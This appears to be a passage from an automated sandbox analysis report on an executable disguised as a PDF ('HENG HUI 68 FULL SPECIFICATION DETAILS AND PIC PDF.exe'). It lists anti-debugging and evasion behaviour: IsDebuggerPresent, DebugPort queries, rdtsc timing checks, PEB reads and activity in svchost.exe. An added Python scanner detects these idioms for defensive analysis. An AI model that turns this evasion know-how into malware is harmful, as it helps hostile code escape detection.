Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | API call chain: ExitProcess graph end node graph_0-93363
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\newdev.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\newdev.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7088E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417723 LdrLoadDll
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00396AAF BlockInput
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00373920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035E01E LoadLibraryA,GetProcAddress
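The `push …; ret`, `pushfd; retf` and `push es; iretd` rows earlier in this section (for example 0_2_00349DD8 `push F7FFFFFFh; retn 0000h`), the `rdtsc` in 1_2_03C7088E and the `mov eax, dword ptr fs:[00000030h]` rows that follow are single-instruction idioms rather than API calls, so a byte scan finds them where an import or hook listing does not. A push followed by a return is a branch to the pushed value that recursive-descent disassembly and call/return matching heuristics do not follow; `rdtsc` measures elapsed cycles to spot single-stepping or a slow sandbox; and in a 32-bit process fs:[30h] is the PEB pointer from which BeingDebugged (PEB+2) and NtGlobalFlag (PEB+0x68) are read. The scanner below is an added example, not code from the report, for 32-bit x86 as executed by these SysWOW64 processes. It is a linear pattern match rather than a disassembler, so it also fires on data bytes that happen to form these sequences; the sample buffer is constructed to hold one of each idiom plus a benign function epilogue.

```python
"""Linear scan of 32-bit x86 code bytes for push/ret control-flow
obfuscation, rdtsc timing checks and fs:[30h] PEB reads (added example)."""

RET_FAMILY = {0xC3: ("ret", 1), 0xC2: ("retn", 3), 0xCB: ("retf", 1),
              0xCA: ("retf", 3), 0xCF: ("iretd", 1)}
PUSH_SINGLE = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
               0x9C: "pushfd", 0x60: "pushad"}
REGS32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
PEB_OFFSET = 0x30  # fs:[30h] holds the PEB pointer in a 32-bit process


def _push_at(buf, i):
    """(mnemonic, length) if a push starts at buf[i], else None."""
    op = buf[i]
    if 0x50 <= op <= 0x57:
        return f"push {REGS32[op - 0x50]}", 1
    if op in PUSH_SINGLE:
        return PUSH_SINGLE[op], 1
    if op == 0x68 and i + 5 <= len(buf):       # push imm32
        return f"push {int.from_bytes(buf[i + 1:i + 5], 'little'):08X}h", 5
    if op == 0x6A and i + 2 <= len(buf):       # push imm8
        return f"push {buf[i + 1]:02X}h", 2
    return None


def _ret_at(buf, i):
    """(mnemonic, length) if ret/retn/retf/iretd starts at buf[i], else None."""
    if i >= len(buf) or buf[i] not in RET_FAMILY:
        return None
    name, length = RET_FAMILY[buf[i]]
    if i + length > len(buf):
        return None
    if length == 3:  # retn/retf imm16: bytes popped after the return address
        name += f" {int.from_bytes(buf[i + 1:i + 3], 'little'):04X}h"
    return name, length


def _fs_peb_read_at(buf, i):
    """(mnemonic, length) for 'mov r32, dword ptr fs:[30h]', else None."""
    if buf[i] != 0x64 or i + 1 >= len(buf):    # 64h = FS segment override
        return None
    if buf[i + 1] == 0xA1 and i + 6 <= len(buf) \
            and int.from_bytes(buf[i + 2:i + 6], "little") == PEB_OFFSET:
        return "mov eax, dword ptr fs:[30h]", 6           # 64 A1 moffs32
    if buf[i + 1] == 0x8B and i + 7 <= len(buf) and (buf[i + 2] & 0xC7) == 0x05 \
            and int.from_bytes(buf[i + 3:i + 7], "little") == PEB_OFFSET:
        reg = REGS32[(buf[i + 2] >> 3) & 7]               # 64 8B /r disp32
        return f"mov {reg}, dword ptr fs:[30h]", 7
    return None


def scan(buf):
    """Return (offset, mnemonic, category) for every idiom found in buf."""
    hits, i = [], 0
    while i < len(buf):
        push = _push_at(buf, i)
        ret = _ret_at(buf, i + push[1]) if push else None
        if push and ret:
            hits.append((i, f"{push[0]}; {ret[0]}", "push/ret obfuscated branch"))
            i += push[1] + ret[1]
            continue
        if buf[i] == 0x0F and i + 1 < len(buf) and buf[i + 1] == 0x31:
            hits.append((i, "rdtsc", "timing check"))
            i += 2
            continue
        peb = _fs_peb_read_at(buf, i)
        if peb:
            hits.append((i, peb[0], "PEB read (BeingDebugged/NtGlobalFlag)"))
            i += peb[1]
            continue
        i += 1
    return hits


# Constructed sample: one instance of each idiom, ending with a benign
# epilogue (mov ebp, esp; pop ebp; ret) that must not be reported.
SAMPLE = bytes.fromhex(
    "33C0"                # xor eax, eax
    "68FFFFFFF7C20000"    # push F7FFFFFFh ; retn 0000h
    "51C3"                # push ecx ; ret
    "06CF"                # push es ; iretd
    "9CCB"                # pushfd ; retf
    "60CB"                # pushad ; retf
    "64A130000000"        # mov eax, dword ptr fs:[30h]
    "648B0D30000000"      # mov ecx, dword ptr fs:[30h]
    "0F31"                # rdtsc
    "8BEC5DC3"            # mov ebp, esp ; pop ebp ; ret
)

if __name__ == "__main__":
    for off, text, cat in scan(SAMPLE):
        print(f"{off:04X}  {text:<32} {cat}")
```

Pointed at a dumped code region (the `.sdmp` memory dumps this report lists, for instance), the density of hits per kilobyte separates injected payload from the host binary's own code, which is where a linear scan earns its keep despite the false positives on data.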
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_020E3480 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_020E34E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_020E1E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C3C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C363CB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C643D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE3DD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB43D5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAC3B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A350 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0371 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0371 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5237A mov eax, dword ptr fs:[00000030h]1_2_03C5237A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6631F mov eax, dword ptr fs:[00000030h]1_2_03C6631F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE289 mov eax, dword ptr fs:[00000030h]1_2_03CAE289
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C542AF mov eax, dword ptr fs:[00000030h]1_2_03C542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C542AF mov eax, dword ptr fs:[00000030h]1_2_03C542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C2B0 mov ecx, dword ptr fs:[00000030h]1_2_03C2C2B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A200 mov eax, dword ptr fs:[00000030h]1_2_03C2A200
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2821B mov eax, dword ptr fs:[00000030h]1_2_03C2821B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50230 mov ecx, dword ptr fs:[00000030h]1_2_03C50230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401C0 mov eax, dword ptr fs:[00000030h]1_2_03C401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401C0 mov eax, dword ptr fs:[00000030h]1_2_03C401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81EE mov eax, dword ptr fs:[00000030h]1_2_03CF81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81EE mov eax, dword ptr fs:[00000030h]1_2_03CF81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C281EB mov eax, dword ptr fs:[00000030h]1_2_03C281EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E1A4 mov eax, dword ptr fs:[00000030h]1_2_03C6E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E1A4 mov eax, dword ptr fs:[00000030h]1_2_03C6E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov ecx, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov eax, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov eax, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6415F mov eax, dword ptr fs:[00000030h]1_2_03C6415F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36179 mov eax, dword ptr fs:[00000030h]1_2_03C36179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60118 mov eax, dword ptr fs:[00000030h]1_2_03C60118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA130 mov eax, dword ptr fs:[00000030h]1_2_03CBA130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC0E0 mov ecx, dword ptr fs:[00000030h]1_2_03CBC0E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F6 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A093 mov ecx, dword ptr fs:[00000030h]1_2_03C2A093
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C090 mov eax, dword ptr fs:[00000030h]1_2_03C2C090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6090 mov eax, dword ptr fs:[00000030h]1_2_03CC6090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C700A5 mov eax, dword ptr fs:[00000030h]1_2_03C700A5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60044 mov eax, dword ptr fs:[00000030h]1_2_03C60044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6040 mov eax, dword ptr fs:[00000030h]1_2_03CB6040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36074 mov eax, dword ptr fs:[00000030h]1_2_03C36074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36074 mov eax, dword ptr fs:[00000030h]1_2_03C36074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38009 mov eax, dword ptr fs:[00000030h]1_2_03C38009
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72010 mov ecx, dword ptr fs:[00000030h]1_2_03C72010
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E7E0 mov eax, dword ptr fs:[00000030h]1_2_03C5E7E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307A7 mov eax, dword ptr fs:[00000030h]1_2_03C307A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCC7B0 mov eax, dword ptr fs:[00000030h]1_2_03CCC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCC7B0 mov eax, dword ptr fs:[00000030h]1_2_03CCC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov ecx, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A750 mov eax, dword ptr fs:[00000030h]1_2_03C6A750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE750 mov eax, dword ptr fs:[00000030h]1_2_03CDE750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42760 mov ecx, dword ptr fs:[00000030h]1_2_03C42760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60774 mov eax, dword ptr fs:[00000030h]1_2_03C60774
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34779 mov eax, dword ptr fs:[00000030h]1_2_03C34779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34779 mov eax, dword ptr fs:[00000030h]1_2_03C34779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3471B mov eax, dword ptr fs:[00000030h]1_2_03C3471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3471B mov eax, dword ptr fs:[00000030h]1_2_03C3471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C306CF mov eax, dword ptr fs:[00000030h]1_2_03C306CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA6C0 mov eax, dword ptr fs:[00000030h]1_2_03CFA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD86C2 mov eax, dword ptr fs:[00000030h]1_2_03CD86C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC66D0 mov eax, dword ptr fs:[00000030h]1_2_03CC66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC66D0 mov eax, dword ptr fs:[00000030h]1_2_03CC66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C6E0 mov eax, dword ptr fs:[00000030h]1_2_03C3C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C566E0 mov eax, dword ptr fs:[00000030h]1_2_03C566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C566E0 mov eax, dword ptr fs:[00000030h]1_2_03C566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
